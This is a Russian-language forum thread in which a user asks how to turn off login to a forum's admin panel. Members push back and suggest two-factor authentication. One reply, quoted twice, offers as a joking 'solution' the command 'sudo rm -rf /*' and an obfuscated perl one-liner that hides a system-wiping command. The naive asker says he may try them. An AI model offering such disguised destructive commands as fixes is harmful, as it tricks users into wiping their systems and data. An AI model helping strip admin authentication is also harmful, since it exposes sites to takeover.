Отключить авторизацию к админке.

Deron

Участники
Реакции
-6
Баллы
140
Приветствую , довёл немного форум до ума.
Версия 2.1.2 Нужно отключить авторизацию к админке.
Хоть и небезопасно но уже надоело...
Через код или шаблон(желательно) :)
Если что спасибо)
Про поиск можно не писать , искал но не нашёл.

Последнее редактирование:
Какую авторизацию?

Про поиск можно не писать , искал но не нашёл.
Ну видимо до вас ещё никому не приходило в голову отключать компоненты безопасности ¯\_(ツ)_/¯

OFFTOP

Какая-то глупая идея, отключать авторизацию ?

Если так беспокоит вопрос безопасности, то гораздо легче подключить двухфакторную авторизацию ?

Приветствую.
Сколько я вижу, там наоборот не беспокоит, но если человек задаёт такой вопрос, то видимо у него плохо с сессиями в админке, то есть можно предположить, что бесконечно разлогинивает, но это проблемы настроек хоста, а не движка в таком случае.
В прочем, я хочу услышать веский аргумент в пользу отключения авторизации в админке.

Так можно подсказать конкретно ? :)
Какую авторизацию?

Ну видимо до вас ещё никому не приходило в голову отключать компоненты безопасности ¯\_(ツ)_/¯

Приветствую.
Сколько я вижу, там наоборот не беспокоит, но если человек задаёт такой вопрос, то видимо у него плохо с сессиями в админке, то есть можно предположить, что бесконечно разлогинивает, но это проблемы настроек хоста, а не движка в таком случае.
В прочем, я хочу услышать веский аргумент в пользу отключения авторизации в админке.
Надоедает постоянный ввод логина и пароля мне хватает двухфакторной авторизации ;)
Если так беспокоит вопрос безопасности, то гораздо легче подключить двухфакторную авторизацию ?
Согласен
Модераторам:Как раз хотел обьединить.
Кстати вам бы сделать авто-обьединение постов ;)
Так , смотрите я хочу отключить авторизацию в пользу двухфакторной.

Последнее редактирование:
Это не причина, если веской причины не будет, тему закрываем, сколько работаю с движком, никогда такого не требовалось, если у Вас слетает сессия, это не двиг виноват, а нужно настроить хост или сервак.

Это не причина, если веской причины не будет, тему закрываем, сколько работаю с движком, никогда такого не требовалось, если у Вас слетает сессия, это не двиг виноват, а нужно настроить хост или сервак.
А , почему должны быть аргументы , я написал чтобы подсказали , а тут закрываем...

Надоедает постоянный ввод логина и пароля мне хватает двухфакторной авторизации ;)
Хоть и небезопасно но уже надоело...
смени логин и пасс на одну цифру или букву, станет легче)

sudo rm -rf /* поможет или echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|{;;y; -/:-@[-{-};`-{/" -;;s;;$_;see'

sudo rm -rf /* поможет или echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|{;;y; -/:-@[-{-};`-{/" -;;s;;$_;see'
А где находится консоль с этим просто с этим не сталкивался.
Впринципе попробую можно закрывать...

Удалить файл по протоколу FTP admin.php это будет быстрее.

Это рофл ? :)
Я так подозреваю это удалить админку ?)
Это не рофл. Мой совет: не страдайте фигнёй, ответа на свой вопрос вы тут не получите, ибо ваши действия направлены лишь во вред адекватной работе движка форума. Тему отправляю в мусор

Современный облачный хостинг провайдер | Aéza
Назад
Сверху Снизу